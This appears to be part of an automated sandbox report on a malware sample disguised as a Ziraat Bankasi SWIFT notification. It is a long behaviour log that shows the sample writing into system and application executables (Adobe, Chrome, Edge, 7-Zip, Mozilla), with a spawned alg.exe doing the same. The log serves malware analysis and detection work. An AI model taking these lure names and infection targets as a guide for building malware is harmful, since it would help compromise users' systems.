Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Writes data at the end of the disk (often used by bootkits to hide malicious code)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Roaming\a8259331cca430bb.bin offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 162304	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735820	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 737280	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1285120	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1286144	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1289427	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735744	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 31704	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Local\Temp\aut9353.tmp offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Local\Temp\aut9353.tmp offset: 520192	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Local\Temp\unnervousness offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 95744	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 669260	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 672768	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 1220608	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 1221632	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 1224840	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 669184	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 53125	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Local\differences\niellist.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 767488	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1341004	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1344512	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1347720	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1340928	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 409168	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Windows\System32\config\systemprofile\AppData\Roaming\a8259331cca430bb.bin offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 2136576	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 2710092	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 2710016	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 1093484	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 1776128	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349644	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349568	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 677164	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 228352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801868	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801792	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 43297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 557056	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 1130572	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 1130496	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 382726	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 952832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 1526348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 1526272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 614020	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 700416	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 1273932	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 1273856	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 464916	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 14848	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588288	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 5610	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 5630464	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203980	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203904	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 3201596	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 27136	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600652	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600576	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 8988	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 31744	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605260	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605184	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 12684	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 332800	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906316	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906240	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 232412	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 3571200	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144640	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 1485948	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59362816	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936332	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 140924	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 3571200	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144640	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 1485948	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59362816	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936332	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 140924	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 50176	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623692	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623616	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 24668	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 328192	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901708	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901632	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 4988	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 642048	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215564	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215488	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 132252	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 11459072	Jump to behavior
